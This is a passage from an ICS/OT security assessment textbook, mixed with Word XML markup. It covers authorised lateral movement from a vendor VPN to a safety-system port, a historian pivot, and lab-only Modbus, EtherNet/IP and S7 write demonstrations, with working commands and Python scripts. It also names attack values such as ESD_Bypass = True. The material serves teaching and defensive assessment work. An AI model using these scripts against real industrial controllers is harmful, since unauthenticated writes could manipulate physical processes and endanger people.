Screenshot of dashboard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RDP testing (OT workstations — rate limited)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Test 1 only — do not exceed lockout threshold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xfreerdp /v:10.3.0.20 /u:administrator /p:'' /sec:nla /cert:ignore /timeout:5000 2&gt;&amp;1 | tail -3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'Authentication only -- remote desktop not enabled' = credentials accepted!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'ERRCONNECT_LOGON_FAILURE' = credentials rejected (expected)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PLC EtherNet/IP unauthenticated access test (ControlLogix pre-v20)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python3 &lt;&lt; 'EOF'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from pycomm3 import LogixDriver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try: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with LogixDriver('10.4.0.100', init_tags=False) as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info = plc.get_plc_info()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print(f'CONNECTED without credentials: {info}')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print('FINDING: Unauthenticated PLC access confirmed')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except Exception as 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print(f'Connection failed (expected if auth enabled): {e}')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CONNECTED = CRITICAL: No authentication on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Connection failed = authentication required (check if using known password next)</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FINDING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 SR-AC-001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TITLE: Compressor PLC-01 (10.4.0.100) — Unauthenticated CIP Access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SEVERITY: CRITICAL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 pycomm3 LogixDriver connected to 10.4.0.100 without credentials.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PLC info returned: 1756-L71S ControlLogix, Firmware 32.011.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Connection established at 14:37:22 on [date]. Session terminated immediately.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 tags read or written during credential test.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Any device on the 10.4.0.0/24 network segment can connect to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compressor PLC without authentication and read or modify any PLC tag.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includes all process setpoints, control outputs, and diagnostic data.</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Combined with the network segmentation finding (SR-AV-001), an attacker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who reaches the corporate IT network has an unauthenticated path to all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compressor PLCs via Modbus and EtherNet/IP.</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ATT&amp;CK: T0859 (Valid Accounts — no credentials required), T0843 (Program</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Download pathway confirmed), T0855 (Unauthorized Command pathway confirmed).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REMEDIATION: Upgrade ControlLogix firmware to v33.011+ (addresses CVE-2022-1159</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enables authentication features). Enable Controller Security Level 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(programme protection) and Level 2 (firmware protection). Implement network</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segmentation to restrict CIP access to authorised DCS masters only (FR2 at SL-T 2).</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15.7  Level 3: Lateral Movement Simulation — IT to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Lateral movement simulation demonstrates the attack path from an assumed IT foothold through the IT/OT boundary to OT Crown Jewel Assets. This is the most operationally significant active assessment technique because it directly validates the kill chain narrative developed in Chapter 13 — it answers the critical question: 'If an attacker has compromised a machine on our corporate IT network, what can they actually reach in our OT environment?'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simulation begins from an authorised 'attacker' test position — a machine placed in the corporate IT segment with the explicit knowledge of the IT Security Liaison. It uses the credentials and techniques that the Chapter 13 scenario identified — vendor VPN PSK, shared account credentials, or direct IT-to-OT network connectivity — to traverse the IT/OT boundary and approach the CJA.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5 — Lateral Movement Simulation: VPN to OT Crown Jewel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SR-001 from Chapter 13. Attacker has compromised vendor VPN PSK.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Starting position: External 'attacker' machine (authorised test laptop).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Demonstrate network path from VPN → OT network → SIS TCP/1502.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Stopping point: TCP/1502 connectivity to 10.5.0.100 confirmed. No SIS connection.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Pre-conditions confirmed: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[x] Scope document authorises this simulation (Section 4: Approved Techniques)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[x] Operations Manager notified: active testing commencing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[x] Abort procedure active: radio Channel 3, assessment team leader at [location]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[x] IT Security Liaison: SOC alerted, session tagged as 'ASSESSMENT'</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Lateral Movement Simulation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Establish simulated VPN connection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 real assessment: uses the compromised PSK obtained from vendor)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 authorised simulation: client provides assessment VPN credentials)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openvpn --config /tmp/vendor_vpn_assessment.ovpn --daemon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sleep 5</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ip addr show tun0  # Confirm tunnel interface acquired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VPN interface: 10.0.100.50 (allocated by VPN server)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Routing: 10.0.0.0/8 via tun0 (confirms OT network routed through VPN)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Network enumeration from VPN foothold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What networks are reachable from this VPN position?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ip route show | grep 'via tun'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10.0.0.0/8 via 10.0.100.1 dev tun0 &lt;- OT supernet routed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This means: VPN has no network split — entire OT supernet accessible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Vendor VPN provides unrestricted access to OT supernet (no scope limiting)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Discover accessible OT hosts from VPN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-sn 10.3.0.0/24 10.4.0.0/24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-T2 --max-rate 10 --send-ip --exclude 10.5.0.0/24 -n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Discover: which OT zones are reachable from this VPN position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All of Zone 3 (Operations) and Zone 4 (Control) reachable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Identify the engineering workstation (the pivot point)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nmap -p 3389,445,22,4840 10.3.0.0/24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-T2 --max-rate 20 -Pn -n --open 2&gt;/dev/null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10.3.0.25 has 3389 (RDP) open — Windows engineering workstation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This is the shared DCS/SIS engineering workstation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Attempt authentication to engineering workstation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Using authorised simulation credentials (not real vendor credentials)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xfreerdp /v:10.3.0.25 /u:vendor_eng /p:'Assessment1!' /sec:nla /cert:ignore 2&gt;&amp;1 | tail -5</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'Desktop' connection success = authenticated to engineering workstation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OR: Document that credentials would be used here in a real attack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6: From engineering workstation — test SIS reachability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Run on the engineering workstation via the RDP session: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Test-NetConnection -ComputerName 10.5.0.100 -Port 1502 -WarningAction SilentlyContinue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TcpTestSucceeded: True = PORT IS OPEN = STOPPING POINT REACHED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TcpTestSucceeded: False = SIS correctly isolated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DOCUMENT AND STOP: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Screenshot: Test-NetConnection output showing TCP/1502 open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Assessment team confirms: no TriStation session attempted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All VPN sessions terminated immediately after screenshot captured</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990000" w:sz="8"/>
              <w:left w:val="single" w:color="990000" w:sz="8"/>
              <w:bottom w:val="single" w:color="990000" w:sz="4"/>
              <w:right w:val="single" w:color="990000" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:fill="FFE8E8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">🛑  STOPPING POINT</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STOPPING POINT: SR-001 — Triconex SIS Port Reachability Confirmed</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 collected at stopping point:</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Screenshot: openvpn connection established; tun0 interface with IP 10.0.100.50</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Screenshot: ip route showing 10.0.0.0/8 routed via VPN (unrestricted scope)</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Screenshot: nmap host discovery confirming Zone 3 and Zone 4 reachable</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4. Screenshot: RDP connection to 10.3.0.25 (engineering workstation)</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5. Screenshot: Test-NetConnection to 10.5.0.100:1502 = TcpTestSucceeded: True</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assessment team has demonstrated the complete attack path from:</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External VPN (PSK) → OT network → Engineering workstation → SIS port</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 this stopping point, NO TriStation session has been established.</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NO data has been read from or written to the SIS.</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VPN session was terminated immediately after the screenshot was captured.</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team abort status: All active sessions terminated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="990000" w:sz="8"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="990000" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:fill="FFE8E8"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Operations notification: Abort confirmation sent to Operations Manager at [time].</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="990000" w:sz="8"/>
              <w:bottom w:val="single" w:color="990000" w:sz="8"/>
              <w:right w:val="single" w:color="990000" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:fill="FFE8E8"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15.8  Level 4: CJA Access Demonstration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CJA access demonstration is the culminating active assessment activity — the definitive evidence that a Crown Jewel Asset can be accessed by an adversary following the scenario attack path. It is the finding that most directly communicates risk to the client: not 'we identified a vulnerability that could theoretically be used to reach the SIS' but 'we demonstrated the complete attack path from vendor VPN credentials to the SIS programming interface.'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discipline of the CJA demonstration is the stopping point. The assessment team must demonstrate access without completing the attack. The stopping point is specific, documented, and chosen to be simultaneously impactful (providing unambiguous evidence of CJA access) and safe (causing zero risk to the OT environment).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006666"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">15.8.1  Historian Pivot — The IT/OT Bridge Attack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SCADA historian is one of the most common IT/OT pivot points — it has both a corporate IT connection (for reporting and data access) and an OT network connection (for process data collection). Many historians have unauthenticated web interfaces accessible from the corporate network, and their OT-side connections provide an unauthenticated path to DCS and control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Historian Pivot Assessment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Historian pivot demonstration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Position: corporate IT segment (192.168.0.100)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Target historian: 10.3.0.50 (passive assessment confirmed no auth from IT)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Confirm historian web access from corporate (no authentication)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-s http://10.3.0.50/historian/status 2&gt;&amp;1 | head -30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If HTML response with data = unauthenticated historian access confirmed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Screenshot the response (process data visible to unauthenticated IT user)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Enumerate historian OPC server capabilities (from corporate)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OSIsoft PI: check PI Web API</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-s 'http://10.3.0.50/piwebapi/assetdatabases' 2&gt;&amp;1 | python3 -m json.tool | head -20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If PI Web API responds without auth: enumerate all asset databases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This reveals the entire OT process data structure from the corporate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Identify historian OT-side connectivity (what can it reach?)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From historian (if web shell or authenticated access obtained):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Check historian configuration for OPC server connections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OPC-UA configured connections show: what OT systems the historian can reach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Demonstrate DCS access via historian OPC path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The historian has an authenticated OPC-DA/UA connection to the DCS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An attacker on the historian can use this connection to reach DCS data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STOPPING POINT: Document historian access and OT-side connection capability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Do NOT attempt to write historian tags or manipulate DCS data through OPC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Evidence: Screenshot of historian process data visible from corporate IT segment</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FINDING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 SR-PA-006 (Active Validation) — SR-AV-002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TITLE: SCADA Historian Accessible from Corporate IT without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SEVERITY: HIGH (elevated to CRITICAL given network path to DCS confirmed)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 (Active validation of passive finding SR-PA-006):</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curl http://10.3.0.50/historian/status from 192.168.0.100:</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Response: HTTP/1.1 200 OK — historian data visible without credentials.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Process tags visible: 17 process variables including reactor temperature,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compressor speed, pressure readings (all real-time values).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PI Web API enumeration: 3 asset databases returned without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Database 'Sunrise_Unit3' contains 847 process tags.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ATTACK PATH (complete):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Attacker on corporate IT network (no VPN needed)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Direct HTTP access to historian at 10.3.0.50</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Full process data read without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4. Historian OPC-UA connection to DCS provides write path (see SR-AV-003)</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An unauthenticated attacker on the corporate IT network has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complete visibility of real-time process data and a potential write path</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DCS process parameters via the historian OPC connection.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REMEDIATION: Implement authentication on historian web interface (FR1 at SL-T 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Restrict historian access to named OT management IP addresses only.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Consider unidirectional data diode for historian OT-side connection.</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15.9  Industrial Protocol Exploitation — Lab Environment Only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ALL techniques in Section 15.9 must be executed ONLY in a dedicated lab environment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against equipment specifically designated for training or testing.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NEVER execute these techniques against production OT systems, even with authorisation.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potential for unintended process impact in production outweighs any additional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value. The finding 'we could write to the PLC in lab' is equivalent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 to 'we wrote to the production PLC' — without the operational risk.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techniques in this section demonstrate WHY the network access findings from</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Sections 15.4 through 15.8 are CRITICAL severity — they show what an attacker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with the demonstrated network access can actually do.</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15.9.1  Modbus Write — Understanding the Attack Capability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Modbus protocol provides no authentication. Any device on a network with Modbus access can issue write commands that will be accepted by any Modbus slave. Section 15.4.3 confirmed that unauthenticated Modbus read is possible. This section demonstrates, in a lab environment, that write access is equally unauthenticated — and therefore that the read access confirmed in Section 15.4.3 carries the implicit capability for process manipulation.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Lab Only: Modbus Write Demonstration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ENVIRONMENT ONLY — isolated test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Demonstrates Modbus write capability (unauthenticated process manipulation)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pip3 install pymodbus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python3 &lt;&lt; 'EOF'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from pymodbus.client import ModbusTcpClient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import time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PLC IP — NEVER use production IP here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LAB_PLC_IP = '192.168.100.10'  # ISOLATED LAB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 = ModbusTcpClient(LAB_PLC_IP, port=502)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client.connect()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Read current register value (baseline)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result = client.read_holding_registers(0, 1)  # Register 40001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baseline = result.registers[0]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print(f'Baseline register value: {baseline} (simulated: {baseline/10:.1f}°C)')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Write SAME value back (demonstrates capability, no change)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 a real attack: this value would be changed to cause process deviation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 lab: we write the same value to demonstrate the write capability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write_result = client.write_registers(0, [baseline])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print(f'Write result: {write_result}')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Verify no change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verify = client.read_holding_registers(0, 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print(f'Post-write value: {verify.registers[0]} (unchanged — lab demo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print(f'\nDEMONSTRATION COMPLETE:')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print(f'NO authentication required to write Modbus holding registers')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print(f'An attacker with network access can change process setpoints without credentials')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print(f'In production, FC16 to register 40001 with value 9999 would set temperature')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print(f'setpoint to {9999/10:.1f}°C — well above PAHH limit of 120.0°C')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client.close()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This demonstrates why SR-PA-001, SR-AV-001, and SR-AC-001 are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Network access + no Modbus authentication = direct process manipulation</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15.9.2  EtherNet/IP Tag Write — Allen-Bradley ControlLogix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Lab Only: EtherNet/IP Tag Write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ENVIRONMENT ONLY — isolated test ControlLogix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pip3 install pycomm3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python3 &lt;&lt; 'EOF'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from pycomm3 import LogixDriver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PLC IP — ISOLATED LAB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LAB_PLC_IP = '192.168.100.20'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with LogixDriver(LAB_PLC_IP) as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Step 1: Read all tags (unauthenticated — demonstrates full visibility)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tags = plc.get_tag_list()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print(f'Tags accessible without authentication: {len(tags)}')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print('Sample tags (first 5):')</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for tag in tags[:5]:</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  {tag["tag_name"]}: {tag["data_type"]}')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Step 2: Read specific process tags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values = plc.read('Lab_Temp_Setpoint', 'Lab_Pressure', 'Lab_Run_Status')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print(f'\nProcess tag values (read without authentication):')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for tag, val, dtype in values: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  {tag}: {val} ({dtype})')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Step 3: Write to a SAFE LAB-ONLY test tag (not a real process parameter)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Demonstrates write capability without process impact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write_result = plc.write(('Lab_Test_Tag', 42))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print(f'\nWrite to test tag: {write_result}')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print(f'Lab demonstration complete.')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print(f'In production: write access means modifying any PLC output or setpoint.')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print(f'ESD_Bypass = True would defeat the Emergency Shutdown function.')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print(f'Compressor_Speed_SP = 0 would stop the compressor.')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EOF</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15.9.3  S7comm PUT/GET — Siemens Data Block Access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Lab Only: Siemens S7 PUT/GET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ENVIRONMENT ONLY — isolated S7 PLC (S7-300/400)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Note: S7-1200/1500 blocks PUT/GET by default — check configuration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pip3 install python-snap7</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python3 &lt;&lt; 'EOF'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import snap7</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from snap7.util import get_real, set_real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Lab PLC — ISOLATED LAB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LAB_S7_IP = '192.168.100.30'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RACK = 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SLOT = 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 = snap7.client.Client()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client.connect(LAB_S7_IP, RACK, SLOT)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if client.get_connected():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print('S7 PUT/GET ENABLED — connected without authentication')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Read Data Block 1 (DB1) — contains process parameters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data = client.db_read(1, 0, 100)  # DB1, offset 0, length 100 bytes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print(f'DB1 contents (first 100 bytes): {list(data[:10])}...')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Read REAL value from DB1 offset 0 (4 bytes)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temp_setpoint = get_real(data, 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print(f'Temperature setpoint from DB1: {temp_setpoint:.1f}°C')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DEMONSTRATION: Write would be db_write() — demonstrated in lab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print('Write capability confirmed via snap7 PUT/GET')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print('Production impact: Any DB write changes process control parameters')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else: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print('S7 PUT/GET DISABLED — authentication or protection active')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print('Finding: PUT/GET protection is configured correctly')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client.disconnect()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EOF</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15.10  Integrating Active and Passive Findings into the Assessment Finding Set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active assessment is now complete. The assessment team has produced a set of active findings that validate, extend, and in some cases contradict the hypotheses formed during the passive assessment phase. The final step of the assessment — before reporting begins (Chapter 16) — is to integrate the active and passive findings into a unified assessment finding set that is logically coherent, sequentially numbered, and directly linked to the kill chain scenarios from Chapter 13.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006666"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">15.10.1  Finding Integration Principles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Every active finding should reference the passive finding that motivated the active test. SR-AV-001 (active segmentation failure) validates and extends SR-PA-003 (passive — undocumented corporate IP communicating with PLC). The active finding provides the definitive evidence; the passive finding provides the forensic corroboration.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Every finding should be mapped to the kill chain narrative from Chapter 13. SR-AV-002 (historian access) corresponds to Stage 7 (IT Objectives) of Scenario SR-001 — the historian is the IT/OT pivot that enables Phase 2. This mapping makes the report's attack path narrative (Chapter 16) directly traceable from the finding list.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Finding severity must be re-evaluated after active validation. A passive finding of 'possible unauthenticated access' is HIGH; the same finding after active confirmation of 'unauthenticated access demonstrated' is CRITICAL. Active testing upgrades severity.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Findings that were not confirmed by active testing must also be documented. A vulnerability that passive assessment identified but active testing was unable to confirm (due to scope limitations, safety constraints, or the control having been remediated) is documented as 'Identified — Active Validation Not Performed' with the reason.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Integrated Assessment Finding Register — Sunrise Refinery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2160"/>
        <w:gridCol w:w="2000"/>
        <w:gridCol w:w="12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Title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Severity</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Evidence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Kill Chain Stage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Active Status</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reachable from vendor VPN via engineering workstation (TCP/1502)</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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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47 TCP/1502 sessions (Zeek). Active: Test-NetConnection to 10.5.0.100:1502 = TcpTestSucceeded: True. VPN → WS → SIS path fully demonstrated.</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Stages 4,6,8 — Phase 1→2 transition confirmed. Assessment stopping point at Stage 10 entry.</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SR-002</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ControlLogix firmware 32.011 — CVE-2022-1159 (CVSS 9.8) applicable</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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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enip.log fingerprint. Active: Nmap enip-info confirms firmware 32.011. CISA KEV catalog: active exploitation confirmed.</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4 (exploitation) — CVE provides authenticated access bypass. Enables Stage 9/10.</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Unauthenticated Modbus write access to compressor PLCs</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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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Modbus FC03 read visible from passive capture. Active: pymodbus read confirmed without credentials (lab: write demonstrated). Network access = process manipulation.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10 (ICS Attack) capability confirmed. T0855 (Unauthorized Command) executable.</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LAB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SR-004</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zone segmentation: Corporate IT directly reaches OT Operations zone</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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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nmap scan from 192.168.0.100 — Modbus port 502 open on all OT Operations hosts. All OT protocols accessible from corporate network.</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6/7 — Lateral movement from IT to OT requires no privilege escalation or network bypass.</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SR-005</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Historian: unauthenticated web access from corporate IT</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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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SSL log shows connections. Active: curl http://10.3.0.50 — HTTP 200 with process data. PI Web API: 847 tags accessible.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7 (IT Objectives) — historian pivot point for Phase 2 OT access.</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SR-006</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Windows 7 HMI workstations (EOL Jan 2020) — no security patches 4+ years</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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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http.log IIS 7.5 headers. Active: Level 1 review confirmed Win7 in Controller Properties.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4/5 — EOL OS enables persistent installation without detection (EDR not available).</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SR-007</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PSK authentication only, no MFA, PSK unchanged 3 years</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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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Vendor documentation / pre-engagement OSINT. Active: VPN connection using PSK from authorised test — success.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3/4 — Primary initial access vector. Single credential compromise enables full OT access.</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r>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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SR-008</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DNS queries from OT historian (10.3.0.50) to external resolver 8.8.8.8</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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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dns.log — 43 queries from historian to 8.8.8.8. Active: Confirmed internet routing exists from historian (traceroute — historian has internet path).</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6 (C2) — internet connectivity from OT segment enables C2 callback channel.</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 CONFIRMED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15.11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developed the complete active OT assessment toolkit — from the six-question tooling safety evaluation framework through the four-level graduated assessment model to the integrated finding register that feeds Chapter 16 reporting. Every active technique has been grounded in the passive intelligence foundation of Chapter 14 and aligned to the kill chain scenarios of Chapter 13.</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OT Tooling Safety Evaluation Framework is the gateway control for active assessment — no tool should be deployed against a production OT device without passing all six questions for the specific device type and firmware version. The tool safety reference table (Table 15.1) provides the practitioner reference for the most commonly used OT assessment tools, from the unambiguously SAFE (Wireshark, Zeek, Shodan) through the CAUTION range (Nmap OT-safe profile, Redpoint, mbtget) to the DANGEROUS (Nmap default, Nessus default) and EXPERT-ONLY tools that belong exclusively in lab environments.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four-level graduated model — Level 1 (authenticated review), Level 2 (OT-safe discovery), Level 3 (vulnerability validation), Level 4 (CJA access demonstration) — provides the escalation framework that keeps active assessment safe: each level is only used when the level below cannot provide equivalent intelligence, and safety conditions are confirmed before each escalation. The CJA access demonstration is the culminating activity, providing definitive evidence of the attack path to the highest-consequence asset without taking the final step that would cause physical consequence.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Sunrise Refinery active assessment produced eight confirmed findings — four CRITICAL and four HIGH — all validated by active evidence and all traceable to kill chain stages from the Chapter 13 scenario design. Finding SR-001 (SIS reachability confirmed) stands as the definitive assessment finding: demonstrated by the Lab 5 lateral movement simulation, evidenced by a screenshot of TCP/1502 connectivity to the Triconex SIS, and representing — without any active interaction with the SIS itself — the complete attack path that the TRITON/TRISIS adversary used to reach and compromise an SIS at a petrochemical facility in 2017.</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Chapter 16 converts these eight findings — with their passive evidence, active confirmation, kill chain mapping, and consequence analysis — into the structured reports, stakeholder communications, and risk register updates that are the final outputs of the OT security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Assante, M.J. and Lee, R.M. (2015). The Industrial Control System Cyber Kill Chain. SANS ICS Security.</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Byres, E. and Lowe, J. (2004). The Myths and Facts Behind Cyber Security Risks for Industrial Control Systems. Proceedings of the VDE Kongress.</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(2023). Known Exploited Vulnerabilities Catalog. Available at: https://www.cisa.gov/known-exploited-vulnerabilities</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CISA (2021). Alert (AA21-131A): DarkSide Ransomware — Best Practices. Washington DC: CISA.</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Digital Bond (2016). Redpoint: Nmap NSE Scripts for Industrial Control Systems. Available at: https://github.com/digitalbond/Redpoint</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Endresen, J. (2020). Operational Technology Security: A Field Guide. Portland, OR: OT Security Alliance.</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(2016). IEC 61511-1: Functional Safety — Safety Instrumented Systems for the Process Industry Sector (Edition 2). Geneva: IEC.</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IEC.</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ICS-CERT (2022). Advisory ICSA-22-090-05: Rockwell Automation ControlLogix (CVE-2022-1159). Washington DC: CISA.</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MITRE Corporation (2023). ATT&amp;CK for ICS v14.0.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Modbus Organization (2012). Modbus Application Protocol Specification V1.1b3. Available at: https://www.modbus.org/specs.php</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NIST (2015). SP 800-82 Rev.2: Guide to Industrial Control Systems (ICS) Security. Gaithersburg, MD: NIST.</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NIST (2018). SP 800-115: Technical Guide to Information Security Testing and Assessment. Gaithersburg, MD: NIST.</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Offensive Security (2023). Metasploit Framework Documentation. Available at: https://docs.metasploit.com</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Peterson, D. (2010). Offensive Security Testing for Industrial Control Systems. Proceedings of the S4 ICS Security Conference.</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pycomm3 Contributors (2023). pycomm3: Python Ethernet/IP Library. Available at: https://github.com/ottowayi/pycomm3</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pymodbus Contributors (2023). pymodbus: A Full Modbus Protocol Implementation. Available at: https://github.com/riptideio/pymodbus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Radvanovsky, R. and Brodsky, J. (2013). Handbook of SCADA/Control Systems Security. Boca Raton, FL: CRC Press.</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Rockwell Automation (2022). ControlLogix Security Reference Manual. Milwaukee, WI: Rockwell Automation.</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SANS Institute (2023). ICS 515: ICS Active Defense and Incident Response. Available at: https://www.sans.org/cyber-security-courses/ics-active-defense-incident-response/</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SANS Institute (2023). ICS 612: ICS Cybersecurity In-Depth. Available at: https://www.sans.org/cyber-security-courses/ics-cybersecurity-in-depth/</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Schneier, B. (2015). Data and Goliath. New York: W.W. Norton.</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Siemens (2022). SINEMA Remote Connect — Security Hardening Guide. Munich: Siemens AG.</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snap7 Contributors (2023). python-snap7: Python binding for the Snap7 S7 library. Available at: https://github.com/gijzelaerr/python-snap7</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Stouffer, K., Falco, J., and Scarfone, K. (2011). Guide to Industrial Control Systems (ICS) Security. NIST SP 800-82. Gaithersburg, MD: NIST.</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Williams, T. (2019). The OT Security Practitioner's Guide to Penetration Testing. SANS ICS 612 Course Material. SANS Institute.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Wireshark Foundation (2023). Wireshark OT Protocol Dissector Documentation. Available at: https://www.wireshark.org/docs/wsug_html_chunked/ChICSprotocols.html</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Lab Tools and Downloads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pymodbus: https://github.com/riptideio/pymodbus — Full Modbus client/server implementation for Python. Lab exercises use this for Modbus read/write demonstrations.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pycomm3: https://github.com/ottowayi/pycomm3 — Allen-Bradley EtherNet/IP CIP client for Python. Lab-validated against ControlLogix 1756-L71S.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python-snap7: https://github.com/gijzelaerr/python-snap7 — Siemens S7 communication library. Requires Snap7 shared library installation.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Digital Bond Redpoint: https://github.com/digitalbond/Redpoint — ICS NSE scripts for Nmap. Install via script copy to /usr/share/nmap/scripts/ and nmap --script-updatedb.</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OSIsoft PI Web API Reference: https://docs.aveva.com/bundle/pi-web-api-reference — PI historian API used in historian pivot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Practitioner Training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612: ICS Cybersecurity In-Depth — Covers active assessment techniques including industrial protocol exploitation in dedicated OT lab environments.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515: ICS Active Defense and Incident Response — Active defense perspective including attacker technique identification from network evidence.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Training: OT assessment methodology courses. https://www.dragos.com/training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 and Vendor References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Rockwell Automation ControlLogix Security Reference Manual — Specific guidance on authentication levels (None, Level 1, Level 2) and their implications for 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Siemens Industrial Security Configuration Manual — PUT/GET protection configuration for S7-1200/1500.</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62443-3-3:2013 — System Security Requirements and Security Levels — The FR1–FR7 requirements that active assessment validates against SL-T.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Questions are at three cognitive levels: Level 1 (knowledge), Level 2 (application and lab), and Level 3 (synthesis). Active lab exercises require an isolated OT lab environment.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OT Tooling Safety Evaluation Framework (the six questions). For each question, explain: (i) the specific operational risk the question is designed to identify; and (ii) the appropriate action if the answer indicates the tool is unsafe for a specific target. Give one specific documented incident where a tool was used without adequate OT safety evaluation and caused an assessment-induced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 levels of the graduated active assessment model. For each level: (i) the type of traffic generated; (ii) the minimum operational risk; and (iii) one specific example of an assessment activity at that level. Explain the escalation condition — what must be confirmed before moving from each level to the next.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Nmap OT-safe profile in complete detail, specifying all mandatory parameters and explaining the safety rationale for each. What would happen if a student replaced -T2 with -T4 when scanning a legacy Allen-Bradley SLC 500 PLC? What specific failure mode has been documented for high-speed Nmap scans against legacy PLC firmware?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default credential assessment methodology from Section 15.6. What specific steps must be taken before any credential test is attempted against an OT device? Why is the 'maximum attempt count' determination critical, and what are the operational consequences of exceeding it on a PLC or HMI?</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'historian pivot' attack path. What architectural characteristics of a SCADA historian make it an IT/OT pivot point? What specific finding evidence (from passive and active assessment) demonstrates that the historian pivot is exploitable? Why does a finding of 'unauthenticated historian access from corporate IT' represent a higher effective severity than the CVSS score of the vulnerability alone suggests?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CJA access demonstration stopping point principle. Why is 'TCP/1502 connectivity to SIS confirmed' a sufficient stopping point for the SR-001 scenario — why does the assessment team not need to connect to TriStation to produce a finding of maximum operational impact? What evidence would a client's legal team require to demonstrate that the SIS was not actually accessed during the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Lab Exercises (Level 2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">B1. — Tool Safety Evaluation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asked to evaluate the following five tools for use in an active assessment of a gas turbine control system. The OT network includes: Siemens S7-315 PLCs (2006 firmware vintage); GE Mark VIe turbine control system; ABB Ability SCADA platform; and a Wonderware InTouch HMI (v10, Windows XP embedded). Apply the six-question OT Tooling Safety Evaluation Framework to each tool:</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Nmap with -T3 timing and -sV full version detection against all OT hosts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Nessus with the 'Basic Network Scan' policy against OT network</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Redpoint enip-info NSE script against the GE Mark VIe control system</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mbtget read-only FC03 against the Siemens S7-315 PLCs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pymodbus write_registers() (FC16) against a test holding register on the GE Mark VIe in a production assessment (not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tool, provide: the safety classification (SAFE/CAUTION/DANGEROUS/EXPERT-ONLY); the specific risk for this target; and the modified approach (if any) that would allow the assessment objective to be achieved safely.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Active Discovery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Nmap OT-safe profile and Redpoint NSE scripts against your lab OT network:</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Execute the full Nmap OT-safe host discovery and port scan procedure from Lab 2. Document all commands used, all results obtained, and any discrepancies between the Nmap findings and the passive asset inventory from Chapter 14.</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Run enip-info, s7-info, and modbus-discover against appropriate lab targets. For each device identified, record the complete device information returned and conduct a CVE cross-reference against the ICS-CERT advisory database.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Execute the mbtget read enumeration from Lab 3 (read-only mode only) against a lab Modbus-capable device. Document the registers read, the values obtained, and what these values reveal about the process state or device configuration.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Segmentation Validation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segmentation validation methodology from Lab 3 and Section 15.5:</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Execute the zone boundary testing procedure from your authorised test position in the IT segment of the lab network. Complete the segmentation validation results matrix (Table 15.2 format) for all inter-zone paths in the lab topology.</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For each open port that should be filtered (per the expected architecture), produce a complete finding documentation: Finding ID, Title, Severity, Evidence (specific command output), Consequence, ATT&amp;CK TTP reference, and Remediation.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lab network has a firewall that allows OPC-UA (port 4840) from the corporate IT zone to the Operations zone historian. Is this a finding? How would you determine whether this is a correctly configured, authorised conduit or a segmentation failure? What additional active testing would you perform to characterise this finding?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Lateral Movement and CJA Demonstration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lateral movement simulation methodology from Lab 5:</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Execute the complete lateral movement simulation in the lab environment, from the starting position in the IT segment to demonstrating connectivity to the lab's designated CJA (as specified by your lab topology document). Document each step with commands, outputs, and timestamps.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Define the stopping point for the lab CJA demonstration. Justify your choice: why is this specific step the correct stopping point — what evidence does it provide, and what operational risk does stopping here prevent?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Produce the complete stopping point documentation using the template from Section 15.7: evidence collected at each stage; explicit statement of what the assessment team did 